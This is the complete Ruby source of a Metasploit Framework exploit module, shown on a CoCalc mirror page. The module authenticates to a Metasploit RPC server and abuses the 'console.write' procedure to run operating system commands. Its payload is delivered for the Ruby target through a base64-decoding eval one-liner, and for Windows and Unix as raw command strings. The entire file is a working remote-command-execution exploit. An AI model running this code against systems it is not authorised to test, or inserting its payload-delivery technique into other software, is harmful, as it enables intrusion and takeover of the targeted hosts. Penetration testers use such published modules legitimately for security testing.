CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/msf_rpc_console.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6


7
class MetasploitModule < Msf::Exploit::Remote

8
  Rank = ExcellentRanking

9


10
  include Msf::Exploit::Remote::Tcp

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'            => 'Metasploit RPC Console Command Execution',

15
      'Description'     => %q{

16
        This module connects to a specified Metasploit RPC server and

17
        uses the 'console.write' procedure to execute operating

18
        system commands. Valid credentials are required to access the

19
        RPC interface.

20


21
        This module has been tested successfully on Metasploit 4.15

22
        on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit

23
        4.14 on Windows 7 SP1.

24
      },

25
      'License'        => MSF_LICENSE,

26
      'Author'         => 'bcoles',

27
      'References'     =>

28
        [

29
          [ 'URL', 'https://help.rapid7.com/metasploit/Content/api/rpc/overview.html' ],

30
          [ 'URL', 'https://community.rapid7.com/docs/DOC-1516' ]

31
        ],

32
      'Platform'       => %w{ ruby unix win },

33
      'Targets'        => [

34
          [ 'Ruby',        { 'Arch'     => ARCH_RUBY,

35
                             'Platform' => 'ruby',

36
                             'Payload'  => { 'BadChars' => "\x00" } } ],

37
          [ 'Windows CMD', { 'Arch'     => ARCH_CMD,

38
                             'Platform' => 'win',

39
                             'Payload'  => { 'BadChars' => "\x00\x0A\x0D" } } ],

40
          [ 'Unix CMD',    { 'Arch'     => ARCH_CMD,

41
                             'Platform' => 'unix',

42
                             'Payload'  => { 'BadChars' => "\x00\x0A\x0D" } } ]

43
        ],

44
      'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 15 },

45
      'Privileged'     => false,

46
      'DisclosureDate' => '2011-05-22',

47
      'DefaultTarget'  => 0))

48
    register_options [ Opt::RPORT(55552),

49
                       OptString.new('USERNAME', [true, 'Username for Metasploit RPC', 'msf']),

50
                       OptString.new('PASSWORD', [true, 'Password for the specified username', '']),

51
                       OptBool.new('SSL', [ true, 'Use SSL', true]) ]

52
  end

53


54
  def execute_command(cmd, opts = {})

55
    res = @rpc.call 'console.write', @console_id, "\r\n#{cmd}\r\n"

56


57
    if res.nil?

58
      fail_with Failure::Unknown, 'Connection failed'

59
    end

60


61
    unless res['wrote'].to_s =~ /\A\d+\z/

62
      print_error "Could not write to console #{@console_id}:"

63
      print_line res.to_s

64
      return

65
    end

66


67
    vprint_good "Wrote #{res['wrote']} bytes to console"

68
  end

69


70
  def exploit

71
    begin

72
      @rpc = Msf::RPC::Client.new :host => rhost, :port => rport, :ssl => ssl

73
    rescue Rex::ConnectionRefused => e

74
      fail_with Failure::Unreachable, 'Connection refused'

75
    rescue => e

76
      fail_with Failure::Unknown, "Connection failed: #{e}"

77
    end

78


79
    res = @rpc.login datastore['USERNAME'], datastore['PASSWORD']

80


81
    if @rpc.token.nil?

82
      fail_with Failure::NoAccess, 'Authentication failed'

83
    end

84


85
    print_good 'Authenticated successfully'

86
    vprint_status "Received temporary token: #{@rpc.token}"

87


88
    version = @rpc.call 'core.version'

89


90
    if res.nil?

91
      fail_with Failure::Unknown, 'Connection failed'

92
    end

93


94
    print_status "Metasploit #{version['version']}"

95
    print_status "Ruby #{version['ruby']}"

96
    print_status "API version #{version['api']}"

97


98
    vprint_status 'Creating new console...'

99
    res = @rpc.call 'console.create'

100


101
    if res.nil?

102
      fail_with Failure::Unknown, 'Connection failed'

103
    end

104


105
    unless res['id'].to_s =~ /\A\d+\z/

106
      print_error 'Could not create console:'

107
      print_line res.to_s

108
      return

109
    end

110


111
    @console_id = res['id']

112
    print_good "Created console ##{@console_id}"

113


114
    print_status 'Sending payload...'

115


116
    case target['Platform']

117
    when 'ruby'

118
      cmd = "ruby -e 'eval(%[#{Rex::Text.encode_base64(payload.encoded)}].unpack(%[m0]).first)'"

119
    when 'win'

120
      cmd = payload.encoded

121
    when 'unix'

122
      cmd = payload.encoded

123
    else

124
      fail_with Failure::NoTarget, 'Invalid target'

125
    end

126


127
    execute_command cmd

128
  end

129


130
  def cleanup

131
    return if @console_id.nil?

132


133
    vprint_status 'Removing console...'

134
    res = @rpc.call 'console.destroy', @console_id

135


136
    if res.nil?

137
      print_error 'Connection failed'

138
      return

139
    end

140


141
    unless res['result'].eql? 'success'

142
      print_warning "Could not destroy console ##{@console_id}:"

143
      print_line res.to_s

144
      return

145
    end

146


147
    vprint_good "Destroyed console ##{@console_id}"

148
  ensure

149
    @rpc.close

150
  end

151
end

152


153